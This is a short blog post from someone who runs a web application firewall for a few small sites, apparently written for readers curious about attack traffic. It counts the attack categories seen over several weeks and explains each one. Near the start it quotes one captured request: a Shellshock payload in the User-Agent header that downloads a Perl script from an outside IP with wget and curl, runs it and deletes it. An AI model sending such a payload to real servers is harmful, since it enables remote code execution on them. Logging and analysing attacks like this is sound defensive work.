Attack of the Day

Statistics..

Break out your text books, kids.  Today we’re going to talk about statistics..  Well, more like “counting with graphs” but whatever..

Couple of point on the data presented below.  First, it is very common to see a single request violate several rules.  Take this request, for instance.

GET /cgi-bin/bts.cgi HTTP/1.0
Host: 69.44.4.28
User-Agent: () { :;}; /bin/bash -c "cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex"
Connection: Keep-Alive
X-Forwarded-For: 72.9.231.226
X_FORWARDED_PROTO: https

There’s so much wrong with this, I’m not sure where to start. Signature violations, use of an illegal filetype (for my policy), violations of HTTP protocol..  There were 9 different signature violations in this one request.  To be fair, this request has more wrong with it than most. Typically, violations I see are landing in two or three buckets. I only point this out to put some context around the numbers posted below.

Second thing I’ll point out is that I have a few different policies that protect sites other than www.planetspork.com. They are small, crappy sites just like this one.  I host them for free and I get to see the requests. It’s a fair trade.

Final point is that each number in the data below could represent an alert (warning) or a block. Why is that? Some things I take a pretty hard line about (no sql injections).  Other things only trigger a warning (the request is from a known bad IP address).  As far as these graphs are concerned, they are both the same.

With that, I present to you the data. This isn’t quite 30 days of attacks, but it’s what I have available since the project started. There are some category descriptions at the bottom of the page, if you’re curious.  Enjoy.

Attack TypeRequests
HTTP Parser Attack748
Abuse of Functionality403
Detection Evasion216
Command Execution185
Injection Attempt178
Non-browser Client134
Predictable Resource Location118
Information Leakage61
Buffer Overflow57
Forceful Browsing56
Total Attacks count for all requests2267

Categories

HTTP Parser Attack – This is the “stupid hacker” category.  HTTP Headers without any values, host headers with IP addresses instead of host names, HTTP1.1 requests without Host headers and the like land here.

Abuse of Functionality – When a request uses a website’s own functionality against it, we land here.  File upload pages and trackbacks are good places to find these attacks.

Detection Evasion – This bucket increments when the attacker needlessly encodes data or uses path traversal to trick the host into executing something it shouldn’t.

Command Execution – Requests that contain extra information in an attempt to get the web server to run a command it probably shouldn’t..  Shell Shock things go here.

Injection Attempt – This category increments when those crazy hackers drop SQL statements right into my unvalidated input fields..

Predictable Resource Location – Just what it sounds like..  Default locations for login pages, example pages that might reveal information, those kinds of things.

Information Leakage – Got info heading away from your site that maybe shouldn’t be?  That shows up here.  It doesn’t require an adult diaper, which is what I initially thought this meant.  🙂

Non-Browser Client – You know, the wget/curl/xyz-spider type requests.  Not necessarily bad, but tracked none the less.

Forceful Browsing – Incremented when a request doesn’t respect the rules of an application.  For instance, if a request to wp-admin.php is made before a visit to wp-login.php has happened.